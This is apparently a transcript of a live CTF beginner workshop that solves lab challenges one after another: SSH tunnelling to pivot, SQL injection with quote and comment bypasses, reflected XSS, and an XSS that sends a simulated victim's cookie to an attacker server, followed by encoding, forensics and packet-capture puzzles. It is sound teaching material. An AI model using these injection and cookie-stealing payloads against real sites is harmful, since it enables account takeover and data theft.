 Again, you know, I use the specific environment and it's all the same concept, but it's just a little bit different like permissions are a little bit different using a different client might behave differently and so on. Okay, SSH tunneling is a whole other beast. i'm going to do a diagram, which is going to be super ugly, but I hope will make my point across. I'm looking for something that can draw. Okay, so our the system we are connecting to is. On the Internet. This is our client over here there's probably better tools that I could use. And let's read the description of our challenge from the pivot box machine so what what what machine are they talking about Oh, we acquired it in the SSH China challenge, so we are reusing something we got access to previously, you can reach a service that spits out a secret. However, pivot box lacks many tools like NC or socap. Maybe we should learn to use SSH tunnels to reach that service. The service is at sysadmin-service on port 5555 so if we would diagram this, it basically would look like this. So our sysadmin service. Let's call it SSS is better. It's behind a wall right it's not reachable directly from our laptop, so there's no way to do this so that doesn't work that doesn't work now and apparently from SSH we don't have the tools necessary to be able to poke directly the the service let's try you know when you never should take the hint for granted or the description for granted let's try okay. Usually for a plain text service you use netcat or curl or whatever. We can try that or we can try ping sysadmin service so now we will not oh I don't even have ping on the system. Can I install ping. Oh I don't have permission to install software so I could maybe upload software that could be a way to solve that challenge but clearly in my description this is not what I want you to learn here so we're not going to do that. But then I can try okay do I have curl I don't have curl so curl would is a is a HTTP client. I do I have netcat I don't have netcat I have W get I have W get so maybe this could work but again you know the whole of the challenge let's try. Okay it works now so the service was down but I brought it up so if it was down it means that it's easy it's agile so let's be kind with the service but if it's ever down again just let me know we'll restart it so I it worked ish but I couldn't. write the file so permission denied so clearly again this is not the way but basically what I want to add here is that even though we have presence here we cannot try to reach the service this way, so that does not work here we don't have sufficient access, but so this is where. tunneling or pivoting kicks in we can use SSH as a tunnel. Okay, so this basically is a tunnel to reach the other system on the other side of it so the connecting to SSH regularly. We build the tunnel and we tell the tunnel when a packet arrives here we want you to send it there on the other end of that tunnel. So we're going to write an SSA a fancy SSH command that will do that it will go in the tunnel and we go out the tunnel so this is where it has reach to the other network. Well, this is getting confusing, but and it will like come out and be able to reach the other system now in SSH's language, this is called SSH tunneling but specifically local forward local port forwarding so now we can you know, google it. And just, you know, we don't care about the concept we want the command okay the command is here I explain the concept that's why I'm skipping ahead, but so dash capital L local IP but it's optional local port mandatory destination and destination port. Luckily, we have all that in our challenge description. So we disconnect this is important we're tunneling through that system so we were not going to do that on that system. So we disconnect we reuse our previous command because we need to authenticate to the service with the same user and the same port. And the same key, but we're going to add the the the forwarding characteristics. So destination port if we look at the challenge description is 5555 so we have it like the service that we're trying to have spit out a secret. is running at 5555 so let's do that 5555. The destination is the name. So here we docker is kind with us it provides DNS so we're not using real IP. We're using names. So we put that in here, and then the local port is pretty much at our discretion. I like to use 12345 easy to remember. And then the local IP is. If you need to buy buying to something else than local host, but we don't need to do that. So I had SSH two times here so I need to remove the extra one. Okay, so now we are doing SSH. We're specifying that we want to do a local forward. So from we're building the tunnel from our machine to the pivot box system on CTF 101, which means that the end of the tunnel will be on the other side of that system. And here we're saying with the other side of the tunnel we're going to do a local forward. So the current system is going to be CTF 101. Which means that the end of the tunnel will be on the other side of that system. And here we're saying with the other side of the tunnel or the system should reach to system in dash service on port 5555. So going back to the diagram. Let's use another color. The command is building this portion here with the specific intention of sending to that system. Now another thing that people might be surprised when they run a command like that is that we will still get our prompt. We are still connected on pivot box. And this is why the reason is SSH has channels and we still requested a command channel, but we added the tunneling channel on top of the command channel by default. We could add a flag that will not require a command channel, but it's just not necessary. But what's counterintuitive about what we just did is that the next step needs to happen on my local system, not on the pivot box system. So I need to open a new terminal. In my case I'm going to split my screen so that you see. But so the next command is I want to send that packet. I want to reach the end game here on port 5555. So to do so, I'm going to use netcat. Now the tunnel is from my machine to this service. So I use 127.0.0.1 or local host. And I chose to use port 1255. So now what will happen if I do that? Congratulations, I pivoted. So my local packets were sent to the destination that we specified in the SSH tunnel. That service is just a kind person that gives the flag on first hit. But then, you know, in the real CTF, the twist is that you'll have to exploit that service or do something more to that service, but the pivoting concepts remain and they are really important. So we're going to copy this. Put that here. Submit and we won. Now, could we run this via directly via the machine? Do you guys figure out from pivot box? How did you do it? It's standard out. Okay, that's a cool one. So let's do that. So I was asking because I knew they would bypass the restriction of the challenge. So let's just do that for fun. Right. So system in service. And then since this is a URL, now the port is not a different parameter. It's part of the URL. And since HTTP is a text based protocol and my flag is text, it's going to, it's going to work. It's going to spit it out. So the previous error we got is it tried to write to the file system, but the file system is unwriteable by definition. I didn't want you to copy executables. So what Vincent suggested as a workaround is, okay, but double you get, you can tell it to instead of write a file to show the file, show the content. So this is capital O for output. And then this would by default try to write to a file, but we're not, we can't. So we're going to use dash dash is like Linux lingo or Linux standard of saying it's standard out. It's a console. So with this capital O. So with this, what we have is, you know, you see that it tried to do HTTP, you see that there's something wrong because it's no headers and it's assuming a super old version of HTTP. But still, you know, we got somewhat mingled. We still got enough of the flag to be able to win the challenge. So this would be a bypass of the challenge. And it's totally legit in cts right. We tried to put restriction we tried to send you in a direction, but you can do whatever you want. There's no problem. Okay, so moving on. So now we're really shifting categories of challenge here. These are the web challenges. They're, they're fairly approachable and interesting. But the system in is kind of the base layer, you know, necessary for more infrastructure or, you know, type CTFs. So the source. So here the challenge says use the source Luke said a thousand challenge designers before me. And there's a website. We're going to open the website. Ah, there's a username and password. I'm not sure what to do, but I'll take the hint and and do a view source. Okay, so what we have here is in the source. So we did view source. We have to do disabled the support account, and then the support account if needed support account is with a username and password. So basically this is HTML code to say, you know, it's a comment, don't display it. And I saw so this is pretty much in our face right we know like we need to you know copy this in the page. We're going to do this in just a second but before I go there, I want to talk to you about a twist on a challenge like that that I've seen and just to put you in the mindset of CTF solving. I've seen a challenge like this, that there were empty lines at the bottom and the real flag was just 12,000 lines below. So the only thing that was different is that there was a scroll bar on the side. So sometimes it's really in your face right you need to think about it, or you need to do a control f and then search for flag, or whatever. Now, the username and password so it's welcome to we can close that so support. Welcome to and login hidden account activated here is your flag so we got this place that here. Here we go. Yay. SQL so things are getting spicier but I see many saw so that's good. Okay, SQL injection is. Well, yeah, well, it's clear. It's so if you're a programmer is kind of obvious but if you're not this is more difficult but so the why is SQL injection so pervasive it's because data is mixed with code together. You're on into an interpreter that is the SQL engine. And when that is done, you know, there's there's all sorts of bypasses to be able to access that information. So, if I am so this challenge is instructive and it is a one on one challenge because it shows you that code. So what's happening is so SQL is structured query language and it's to ask questions to a database and you're a pair. Come set up and so usually all SQL queries return a user not a user columns and values. Okay, so rows and columns that it's a table basically in most queries. And the. We see that query here so there's not a regular thing right this is special purpose made, but you can also think that whenever you're trying, you think you have a real an injection, you can always spin up a little database on using my SQL SQL light and try the things on your system, where you can see where you're not in a in a blind environment. So there's always ways to reproduce a smaller subset of the problem on your computer. But now we have the output. So I put it or because the classic is like or one equals one. And here we have hints. So what we are seeing here is, it is in the database. Okay. So we're having this is the content of the database so I'm going to search for flag. Why not. The flag is a nice try so my database is basically trolling us. So now I'm going to try to spice things up by like oh I'm going to try or one equals one. And it says you want to something. But let's take a look at our in at our string. The mistake here is that so we are in a like context. So this is the condition of the query. And there are double quotes. So when we we put in or one equal one we never escape the context of the double quote. So what's not done here. Let's disconnect. Okay, so we have this here. So what we want to do. So this this is the output of when we write or one equals one. Okay, but what we want to do is close that double bracket. This will be give something like this. So like that. And then and then we're going to have this. Okay, so if we put only a double double quote. This is what's going to happen. And this is probably not legal SQL. Let's try. If I put just in double quote. There are so many ways to bypass that challenge by the way. Okay, so I have an error. So it means that I basically the query failed and my scroll through an error PHP caught the error and PHP through the error back our face. In many production context the air will be hidden so all you have to you'll have a 500 or whatever, and this will not help you. So okay so so this one is broken. Now how could I unbreak it. So, I don't I this would kind of be jumping straight into the solution but let's try okay so I'm going to do double quote space or then one equal one, which mean that the query will become this double quote or one equal one and then the they are the remaining person and quotes will still be there. Right. So do we think this will work. Let's try. Since you seem unsure. Have an error. Why is that because we are with the double quote is still here at the end. And it's never starting never ending so it's an unbalanced double quote. So what the trick of all the SQL injection folks is to, there is a functionality in SQL where you say the rest of the line is a comment. So if you turn the rest of the line as a comment. This means that our code will look like this and then comment and the rest doesn't matter that no more quotes balancing or whatever. I can try that. Boom, we've got our flag right here and so the value was flag but written with fancy Unicode letters. And we have a flag with our flag. Now, let's think of a couple bypasses, because now we did kind of the, you know, 101 SQL injection, but looking at it this way here. It's like we're almost there. Right. And this is a new bypass that I figured now, because there's another one that is even easier than keeping for later. But so double quote, and then all I need to do is comment the rest right that would work. So it's try if it does so we're basically because the the person is like the asterisk of SQL percent means anything. So if we only have like percent, we will get all the database or all that table. Sorry. It would be specific. So let's try with just the close quote and then dash dash. It works. We still have our content. Now the easiest bypass is the percent bypass because you will, you will basically get in the command. Triple percent, which means everything everything everything. So let's try and it works. So this challenge is completely, you know, broken if you think about it from the perspective, but it's still educative about how it works and the fact that you can see the query really helps you there. In CTF 201, we could do the step of, you know, having your own database locally, but you know, running a database in on a Linux system is as easy as typing SQL light and then enter. And now you can create a table and then query this is the, the, not sure how it works the schema but it from select one. And you get one, right? Select one, two, three, you have three, one row, three columns, one, two, three. So it's a good way of playing with it, toying with it, but it's a little bit out of scope for what we're trying to do here. All right. Oh, without double quotes, with double quotes. Oh yeah. Interesting. So, but the quotes are there. It works. Okay. It works on all engines. Okay. Interesting. I didn't know about that one. So semi column definitely worked. Okay. Yeah, so moving on to our next challenge. Whoops, I forgot to put the flag. I need my points. It's also a classic that happens in CTF people are stressed and they forget we see a lot. Okay, so communication and your team is really important. We see a lot of double submissions, which means if it's a two or three hour challenge means someone lost three hours could have worked on something else, but worked on the same thing as the other to organize. You can use Discord, Google Drive, you know, choose your or Trello or, you know, Kanban, GitHub project, whatever. Yeah, they are means to collaborate in order to avoid losing time like that. Oh, we have a lot of solve. I'm impressed. You're familiar with this stuff. Okay. So, self excess is a weird one because it's totally fake. But so let's try. Okay, this looks like an injection challenge. Let's try that. And this is not the injection challenge. Okay, so why would you have immediately the reflex of XSS here is because you gave you gave user input to the application and it thrown it throws you back your user input. So now the way of of of trying to see if you have an injection context is to try to write HTML. So context are super important in HTML. And basically, if you can move from HTML context into a script context, then you're basically running code in people's browsers, in this case, yourself. But if you can trick the person because the payload is in the bar address bar. So then it means that you can craft a URL that if you can trick someone to click on it, it will trigger the payload it will run in his browser, and you'll be and you will be the controller of that code. And then you will be able to make it expel trade secrets, which is the next challenge but now we're just going to XSS ourselves. Now, to validate if there is filtering or not here I had decided to add the tags so that it will be bold. So does that work. Oh yes, it's bold. So it means that we are there is no HTML escaping we are injecting HTML here. The payload that you will always see is a good old script alert one payload, which means that the browser will enter in scripting context, it will see JavaScript, it will execute it. So, boom, I have a browser message saying one so it executed code and the code is in the address so it means that if I send this to anyone here you will get a pop up message one. Congratulations you XSS yourself. And here's the flag. Next up is XSS Larry so can you XSS Larry the clicker so basically here we're we're simulating someone who clicks on links like everything you send him. The goal is to steal something from his browser. Because he has cookies that we're interested in. Basically, if you steal the right cookie, you can impersonate me on outlook or whatever right now whatever resource. And so, let's take a look. So, so this is the page we want to steal from. And Larry is here. So he basically it's like sending an email with a link in it and hoping the person will click it so there's just a simulation of that for CTF purposes. And I named him Larry. And I steal a browser cookie for for the CTF 101 domain and the if you want so we don't know where Larry sits or he needs his access to the internet to be and and we need something listening on the internet. Otherwise we will not get when we run code in his context, we will not get the ping to our context to our system. So this is why I recommend you run pivot box, but other people have their own machine online and as long as it's reachable and Larry has the same DNS resolver capabilities as we had for system in service, which you can use this admin SSH and and it should work. And here it says yeah so since this is a shared system. We need to pick up each our own port otherwise we will mess with each other. So let's connect there. I have the web server here. I think we'll I'll pick a different port right away. Think it's just like that. Yeah. Okay, so I have a web server running on zero on all addresses on port 12345, which is reachable like that. We can try to see if Larry works. I think it should connect I don't remember. I'm just skewing the link. Will I get hit. I know I did I don't know that's not the end. No, no, no I need to put system in service. Yeah, made a big mistake so I need to use the, the, the host name that will be resolved as that system on that port. So this is kind of the first test. So we know that we're getting hit by the bus. But now this is why it says a strict. So what we need to do here is craft something in that web page, a URL that when someone clicks on it, it will send the cookie to me a third party here. But now so it will be able to build that. First, we will try to access the content itself. So document point cookie. I do I have a cookie. Can I set the cooking. There's no parenthesis. It's approach. This is the part I always rehearse usually but I didn't today. So I might jump to my solution. So I have Google analytics cookie luckily enough. And so I know that I am injecting. I can run JavaScript. No, now how can I get these cookies sent to me the classic way I don't know that so these guys are actually working in the field. I'm a researcher so I don't do excesses all the time, but they might have a very different payload than I what I'll build with my notes. And so I'm curious to hear about how they'll come up with the solution, but the, the, let's let's start writing down the payload. So one easy way and and this is a bit odd but you if you basically put in an image, the browser will go and fetch that image. So usually this is one of the tricks that are used to to, you know, make a browser reach a different resource. So I know that the clicker will reach that. So if we do this and then href with this and then a that give like this. So this locally will not be satisfying because my system doesn't know anything about SS admin SSH was okay with me. The single quote. No, no, no, no, no. So, as I said, this wouldn't be satisfying, but SSC not href is for a tags. But it will display a broken image anyway. But the where we're heading is like we're building small steps to see the whole solution I have double quotes again, single quotes should bring that back to my notes. Okay. So do we have our image tag is what we're interested in. So the image is here and if we look at the code so this, the dumb has that node in it now, the dumb is the document object model is the, the, the whole web page if you want. So we know that it worked. And now what we want to do is to give that to Larry. Okay, this is a complete URL that will fetch an image on a third party resource, which is system SSH results in a broken image for me will result in a broken image for Larry as well but the difference is that we will see that if it's working. We will see it in our lives here. Okay. Message file not found. It means that we're onto something. Now, what we need to do is add the cookie in that command. Without what's that the link and did we lose the key to add the cookie without using double quotes. And I think this is where I always I'm bad. So, but what you can assemble the string. Wait, wait, wait. Ah, it's good. I think I never saw that one. Okay. So what the when now there are thousands of ways you injecting JavaScript, you can do it however you want. And now they're talking about the cleverest and smallest payload. The difficulty here is you can't use double quotes. So because of that you have to like, you know, because because you could assemble the string but doing it without double quotes with the cookie scan of difficult. So the solution that he's proposing which is very clever is that we're going to do this in a pure JavaScript payload. So window that location is a way in JavaScript to send the browser somewhere. So if Larry clicks on our link, and we send Larry to our system where we have an HTTP server, and we can make the URL leads us to the string we're looking for, we will have the cookie and the flag. So, window that location equals our SSH that service which we can use a single quotes, and then it's plus two continent, and then we're going to do, you know, just because we're fancy stolen equals, and then document that cookie. URL encode the whole thing. Oh, just the cookie. What's the API. This is where you hit Google. Yeah, let's let's do it clean for them. JavaScript, you are encoding and code you are I is that what you're looking for. That's right. You know what, let's do, let's do one without and one with so we see the difference. I mean, I need to probably pack everything. So I have, I want to jump out of the HTML context pick jump in a script script context. I want to send your browser to the did you try it on this on this one. Okay. I'm not sure if the, if it would obey the location and redirect the, the, but I use. Okay, so we're going to send the browser to that URL and here we're saying the URL is something that doesn't exist with parameter document that cookie. So, try it. To me, this is the hardest challenge of CTF 101 because I'm I suck at web. Oh, no, no, no, I didn't do the good thing. So I made another mistake, classic mistake. I put it in the page visitor, but the page visitor visit links. This is not a link. So I need to do it on myself to get the link. Oh, I'm doing. Yeah, I'm kind of. I'm redirecting myself here one second. But this this should work as well. Oh, I lost. Yeah, that's not the right pillow one second. No, I look. Now, now, now, now. Yay. All right, so I have the basically the payload and you could also you are I encode the payload and then you would get the thing is that slash a special character so you need to encode them so they become this is an angle bracket percentage three C the web is just a mess of encoding and you always need to realize where you are and escape in the proper way. And with practice this comes naturally. Like everything, no one bicycles on the first day. Yeah, so we have this here. Let's try. Oh, didn't get my usual Larry prompt. Okay, that's now it worked. Let's wait. Whoops. That's here and then. Oh, yeah, so we're lucky here because we have the thing and it worked without the UI encoding. Let's try with the you are encoding what will it change but nothing was the escape. We can we break. Yeah. But can we show them like if I put a bracket, I will break the I don't think Okay. That's his idea because my I'm going to show you the payload I use usually it's so complicated. I'm going to put the final link here. Yeah, they're there to help if you if you want and and like excess says there's a lot of excess essence and CTF and it's a very one at the difficult one to wrap your head around. So do not hesitate to ask for help. I thought I had my solution. Ah, here it is. Okay, so here that this solution here it uses a script tag to create an image element. So this is basically a way to avoid double quotes. So you can use single quotes everywhere because it's in JavaScript. And so you create the image element and you specify the source and when you do so, you will basically go and fetch that image and when it's trying to fetch that image, it will work. The complicated one I had was that I was trying to concatenate and since you need the image and the source you need two types of quotes. So that doesn't work mixing the because of the book will don't pass. So I, I was using a char encoder so this is like malware like, but I was encoding everything and if I link the string from charcoal in order to build their laughing because they see how fucked up I am and it worked but it's like, yeah, I don't know I've seen more malware than XSS in my life clearly. And so this is the same thing right, it will, and maybe it will work. Now I'm using like once the 192 so I'm using hard coded IPs that will fail so but the thing is that I built the payload, and I encoded it in charcode, and I'm using JavaScript to decode this from charcoal and then evaluating it which means, consider this string as JavaScript, which then runs the payload. And so this was my bypass to avoid the double code so when I said my solution was complicated. Here you go. Okay. So with this, we exfiltrated the flag so let's copy it and put it in submit. Now, a little break for us encoding so again this is comes often and it's it's not. So why is it in CPF 101 since it's so easy. It's because it's always there, but it's not directly there. There are rarely points to be doing to have doing straight up base 64, but a good way to hide a flag, so that it will not you will not be able to find it by looking for flag is by encoding it in basic sport. So this you you kind of have to have the habit of seeing it often and knowing what to do quickly to look at it. So it's also a nice introduction to a very good city of two called cyber chef. So cyber chef is a web tool from gchq, and it does and it's local you're not sending anything to the spies in the UK. It runs in your browser, and it supports a ton of stuff there's even one called magic. And magic didn't. Oh, so magic suggests base 85, but it used a depth of three. We try depth of one. So magic is not working for base intensive. Oh yeah, it's trying a lot of stuff. Maybe a bit too much trying too hard. So basically base 64, the what what gives it away for me is the presence of the equal sign at the end so it's a padded format because it's not on one by necessarily. And so, and it always looks like this so it's a reduced alphabet. It's meant to be safe to pass binary data, and you have it here right it's the second option so from day 64, and then you will get the output in this field. Oh there's a mistake. You should recognize basic encoding techniques just by looking at them congrats because it looks like you just did. Here we go. The CFS1. Larry has too many clicks. We're going to go back to it. It's possible. Wow. I lost the power cycle. I put the URL on the discord. Maybe that's the problem. They're probably more player than I anticipated. I could resize it. We're going to power cycle it or not power cycle but stop. So I'm going to resize this to the point where I must not forget to resize it down because it's going to be 500 bucks a month. I don't want to grow the disk. Can I do that? Yeah, it's trying. Maybe if I refresh, it's still powering us. Oh, it's down now. I don't like that error, that message. I'm not going to resize now. Usually it's fast, but I'm not going to take that risk. Turn on. So if anyone here you're unsure about your XSS payload, try to have it looked at by the guys here, the pros. Because clearly we're exhausting resources. It could be other things. So I'm not blaming anyone, but yeah, Larry is a Node.js app that is spawned so the whole JVM so it can take some resources. It's the first time we're having issues like that, but we used to be, I never put it on discord before. If we're like 100% then it might explain it. But in the meantime, by the way, the XSS payload is kind of similar to what you were trying to do in the beginning. Just an image that isn't valid. It's on error. I didn't mean to do that. Oh, yeah, yeah, yeah. Cool. So. But on error, on error, but how do you, on error, you Image source dot people hex. It's always an error. Yeah, that's where you are. Plus. Oh, yeah, yeah, I know the execute scope, but the, the, you fetch the URL from where from window location. No, sir. Oh, yeah, okay. Any URL does document cookie, but this But I understand because this is going to be JavaScript, but you need it to build it something that will query something with do Ajax or Okay. Okay. So if in on error, you return a URL, the browser will boom, go there. Okay, I didn't know that. Oh, it's a shame. Maybe that's why it works. But that he spins. Okay, I think, yeah, the system in needs to be restarted, but besides that, we're good. Okay, everything is back up. Now let's complete our encoding one. And I have it. Okay, so we're back on track. Document one. So there's a hidden flag in this document. It's, it has two flags. And this is the easiest of the two. So sometimes for a track, it's normal to have more than one flag in a single document, but you need to, you know, think, oh, maybe I didn't find the first one. I need to think of submitting the other one. Let's do this forensic save. Where is the flag? Ah, I know. So document, things can be hidden away, right? So we're going to search for flag. Is that like, oh, look at that. There's something white with a mistake at the bottom. We can highlight it all. And then we can make it dark. My little office is broken. What's that? I don't even know where the colors are anymore. Ah, here it is. Okay, so if you put it, make it bigger. Okay, now color this. Oh, it's a flag. So that's a bad example. But the concept of something hidden in plain sight is the lesson here. I've seen this in CTF, but I don't think we did something like this in North Tech ever and I don't think there's stuff like that at HACFIS is there. I saw that in the real world. Like as someone was trying to find something. So it really happened. Okay, okay, cool. Yeah, it is. In cryptography, they say it's the Kyrkosh principle. Is that the power, the resistance of your cryptography must be in the key, not in the algorithm. This is what we've been doing for years in crypto. But prior to his statement, a lot of encryption was, it was in the algorithm. In the Roman days, they would tattoo a message on the head of someone and then wait for the hair to grow. And then when you receive the slave, you shave the head and you have the message, the secret message. This doesn't respect Kyrkosh principle because if you know the algorithm, you're just going to shave everyone and you're going to find the secrets. So this is like, this is not against Kyrkosh principle sound because clearly if you know someone's going to hide something like that by putting white on white, then you will find their secret. But so up and correct. And we had many saw we had 10 saws before I saw this congratulations. And all I did was a search for flag. Now, this is the same as as as the challenge document one, but there's a, there's a hidden lesson here again. And it's so where to find that and and this I had in a real CPF at hackers. And when I was told the solution I was really pissed off. So I remember for all my life. The technique that was used. But so if we take the text, for example, and we copy and you we paste it in notepad notepad isn't rich, you know, notepad is just whatever you had right. And so is it revealing something that we didn't expect. Let's not do notepad let's do. Yeah, local. So if we paste it in whatever text editor. So what we have is the security format six F capital F or capital L vast capital a capital J. So from there and then it's a dash right so from there you could do F, L, a J dash and then it's. L E F L a J B blah blah blah. Now, what we're going to do here is another opportunity so a classic Defcon quals challenge would be to do something simple like that. But at a scale that you will not be able to solve it without programming. This is a very classical way that they operate the people at Defcon. So let's assume it's a super long flag and it cannot be done and let's try to build it, build a solution using the computer and and do it quickly. Now we're going to so the first word with this is the is this one. And this is probably the last like security for that's it is okay so let's just pick this string specifically. And then let's whip up the good old I Python console so Python has a good repel so a net interpreter that you can program interactively with but I Python is better because it has syntax I think and it will auto complete apis often work with that. Now you can, you know, like I am giving this as a string. And now what I want to do is, okay, let's get all the words. So I can try to do split split on spaces. Now I have a list of words where the last letter is of interest. Okay, now I can get into list the continuation mode and try to do. For C in. So now I am doing I want a character that the. Now I am iterating on a list I can what I can move. Okay. I'm iterating in the list. Okay. And if I do C for C in the split, I will get the words again but now I have C which is the each word, but I want the last character. How can I get the last character in Python. I think it's this. No, this is reverse. This. Yeah. Okay, so this is the last character. So this is what I want to use in my consideration. So here minus one and then the rest. So now, oh, now I have the last character of every word, but still in a list. And now I can join that list on and join the API is you need to use a string. So I'm doing an empty string. Join this list of empty of empty, not empty of the last character I'm interested in. Now clearly there's a problem because I have semicolon and commas. How can I make my one liner even better, I can replace the character so I can train a replace with a coma to nothing. Does that get me further along. Okay, so I have a list I need to do that before the split because I want to work in strength context nothing list context. I can split afterwards. Okay, I'm getting closer but I still have the coma and the dots. So let's add two more replace. Again, I'm going a little bit fast here but the lesson is like a little bit of scripting can go a long way. So here's the kind of scripting by the way that chat GPT is really good at so if you want haven't played with it you should because otherwise we will be replaced by machines. But so we need to be smarter than the machines we need to leverage them. Now we have, we have something odd in there, but we have enough that we can probably figure it out. So, the, the, we saw in the original string that there was one condition that didn't work properly. So we see here is there was no L. So this we skip this the T here. And then this is French. So it's the flag. We can probably figure the subset of French that is real from that here. So you know, again, in five minutes, we whipped out a really quick scripting solution that we could scale. And this comes with practice, you know, you cannot necessarily succeed on the first run and but list continuations and Python is a very powerful construct that gets a lot done in in a one liner. But, and this is the opportunity of CTF code, you don't have to, you know, do ever anything again with it it can be as obscure as you want as long as you got the flag doesn't matter it doesn't have to be containable. So, backslash x, a zero, I think is new line or something like that that got slided into a order a could have been from the good character anyway. So getting rid of that and getting rid of the lowercase t submitting and we got it. Network. Because all CTF have P caps, pretty much true. So this is a wire shark challenge. I love where sharp. Now, but why shark can be really intimidating. You have access to all the layers of the OSI model here, and it will highlight the bites that you are interested in to sometimes what they will do is the challenges they will drown you in in data. You have like large peak gaps many things to look at. You won't know what to do necessarily. Here we I went the minimalistic approach. Again, an approach that by hand could be solvable relatively easily. But we will do a programmatic solution chaining T shark and Python because why not. Now, anyone has an idea or a suggestion on where could you hide flag using ping so using ICMP echo and reply request and echo reply. So, if we look at a regular. Let's try to do a capture. Okay, so if I ping from my system on Google, this looks like this. So the, the layers of ping have echo have a checksum, you have data, data interesting so it seems to be, you know, stuff, and then some characters and then 01234567 on windows it's another one that is very specific right it's ABCD or something. So basically, it looks like it doesn't matter what is in the data of a ping and interestingly enough, it is symmetric. So the data of the reply and the data of the request is the same. And now I will slide in a little, you know, classroom thing that I remember but that does is not important for anyone. The reason they were doing this is because before checksumming, there was corruption at the electrical level that will introduce change changes in the data. And so by using ping, they could detect that kind of problem because the response wouldn't be exactly the same as the request and they could detect issues, but because of modern networking. This is just now a legacy something left in there that is just useful to plug to sound smart. Now, let's go back to our peek at and look at the data portion. What we have is something something and then capital F and the reply is the same. What's the next packet. Oh, capital L. What's the reply capital L. What's the next packet capital a starts to make sense right. So, if you want to do network extraction data extraction at scale, you can use T shark T shark will rely on specific. You basically give it attributes that of the data you're interested into by default it probably it's not interesting necessarily let's take a look. Well, it's interesting as a for assessment, but not for for a CTF player. So it has like timestamp IP addresses and stuff like that. Now, you can put it in a mode called the T fields. Okay, capital T. Yeah, okay. So you can put it in a mode called fields that will tell it to go after the specific fields that you are interested into, which will by default I believe tabs separated so that's outputs nice on the terminal. So I put it in this mode. And now what I want to extract and look at is data. How do I know what's the name of that field in on a T shark common line. So, by, by doing using this function here, prepare as a filter. So if I do this, it will put me as a filter on top, a test, and I can see data that data equals something okay. I'm going to give a better another example just to make it more obvious. It's a little bit small right. Yeah, okay. The show let's say I want to extract automatically the time to live. Okay, how would I do that. You go prepare as a filter selected. And you see IP that TTL is the way to extract that so if we put IP that TTL in our T shark. So back. Okay, IP that TTL what will happen is that for each packet, I will have IP that TTL. Okay, so this is a very useful tip to know what, what are the fields names on the very detailed information that wire sharks divide. Now the one we're interested in is that data. So data data as we found earlier. Let's take a look at that data data. It's cool. I would have expected to have it in as a string. So it's kind of disappointing, but Python to the rescue. How did I change the T shark to the Python. Oh yeah, remember I remember. Okay, so another really cool trick with T shark. Oh, you know what, no, I'm going to show you another tool. Because the Python console is cool, but it's not the self documenting. By that I mean that tomorrow you don't remember the Python Python code you wrote to solve the challenge from the day before. How can you build something that is self documenting so that you will remember, or, you know, be able to show to your friends, or do a write up for the city. So I'm a big fan of Jupyter notebooks. These are basically Python interpreters built in a web browser. Okay, so we're going to I use a lot that a lot for research. So now I will create a Python kernel. This is one of the little known feature of the Jupyter notebook. So this is basically an I Python notebook like I can do, you know, hello, and then print s. Okay, I run that I get hello, I could do, you know, 23 plus 47 and print that and it will run. Okay. Now, what things that not a lot of people know is that if you three panned with a exclamation mark, it will execute a shell command. But you can also save that output in a variable, which means that you get like here you get a list with the content of the current folder. Okay. So now I save the T shark command previously. What we're going to have now is a list of packets with the content. The file doesn't exist, of course, because I am in that directory. So now I have a list of the packets of the data. I realize that it's all the same. So what I want is the last bite, but this is X encoded. So I need to extract the last two character. So one character to character is one bite in X. So yeah, cyber chef could could make that clear I guess so cyber chef 46 in from X means F right so you we could solve it like that. You know, pasting one at a time. Here. Where is my sub chef there. Like we could like, you know, copy and paste. But again, we're going to do it the Defcon large scale mode so we're not going to do that but but many people in CTF would have solved it like that and there's no problem doing so. As long as you got the flag as long as you have the job done is great. But so but we're going to try to do it in the programmatic fashion. So I have this output list of packet. Now there is a copy, like the second packet I'm not interested in so I want to drop one out of two from the list. If I had rehearsed I would remember exactly the way to do it cleanly. I don't remember now so we're going to do the good old fashion stack overflow. Python list, keep one out of two items. And the answer is complicated. That's not what I want. Keep only one out of the like drop I have basically I have two Fs. I want only one F like keep one out of two. Like only the pair wise have something more elegant somewhere. Okay. No, there's a way to do that in the list context one sec. Okay, I think it's. That's it. So, yeah, so this will keep everyone out of the two. It's very easy and fast, no look required but it's more harder to understand. And now okay so now I have a subset of my problem now I want to iterate over each list item and keep just the last two characters. So list continuations back to the rescue. See in packets this will give me one. Now I want to grab the last two. And what does that give this gives me what I'm interested into. Now I want to cast this. This is hex. So I think this is one. No, no, I want. Not sure. Not sure. Yeah. So now I'm close to the solution so I am okay so let's just bubble that back. We are dropping one out of every two and three because we had the ping and the reply so we want only one because the data is exactly the same. So each in that list list continuation is always read outside in for each in that list. I am doing keeping the last two characters. This is an X. So I'm turning it into an integer, but an X is based 16 so I need to tell it is based 16. Now I have an integer, and I'm turning that integer into a character. This is a list continuation so it will create a list. And I use the trick I used before. I join on an empty string, and I get flag network forensics expert. And when you think about it so we're going to make the points before the server crash that would be about its time to crash. And now what is interesting. Here is look at how tight this is right. So basically, you know, a two liner to the flag. It's crazy when you think about all the powerful expressions that you can come back in a in a module that you will have your solution save for you self documenting. So pick up flag. Here we go. All right. So if I convince you to use the notebook. Whoops, what's that migration plan. I hope if I convinced you I think it's a great tool to use for research or for Steve. And then even for work, like you can program your work replace yourself by a script. And okay, so real engineering. It's a crack me simple and safe to execute crack me so why why the asterisk is because you need to be careful with executable that are provided to you. So don't run them on your machine unless or use a VM for that because you don't know who built it and it could be evil, you know. So it's like, at no second we don't do that, but we've done ransomware like fake ransomware as before and you don't know. I think that the challenge designer never intent for harm but but harm could be collateral damage. So the advice is always to use a VM and not not use it on your own computer. I've seen like an open CTF at DEF CON in Vegas. I've seen challenge designer put like destroy your home directory in flags because they were like, huh, that's cool. But I mean, it's this was 10 years ago. It's probably not out of fashion by today's standards, but you still have stuff like that on Stack Overflow like office or read it obfuscated commands that will destroy your machine. So, you know, you have to be careful and CTF they like to, you know, mess with people. So I would I would be careful here. I'm going to run it on my machine just because I'm too lazy. And I built it like I created the code source code. I compiled it myself. But so this is why I say you'll have to trust me on that. So we're going to take a look at the easy one. I'm gonna I always either start static or dynamic. I think I want to start static with you guys so static file analysis is you are looking at it without executing it. So you you are leaving it like that. So you're not opening it. There's no chance of infection unless it breaks the software you're using to analyze it, which is very, very rare. I've never seen that before. Whereas dynamic analysis is you execute it oftentimes with a debugger, and you look at the state and you try to figure out what's what's going on. It's difficult to design a good crack me because when you think about it, this is an executable that has the flag in it. So it means that the job of the designer is to make it hard for you to get to that flag, but not too, but not too hard. So let's take a look at this one given that context. We're going to use the Ghidra tool to do that. Either pro is too expensive for my taste. And so when the drug came out I gradually stopped using either pro. You can because it's free and open source but for static analysis you could do it outside the 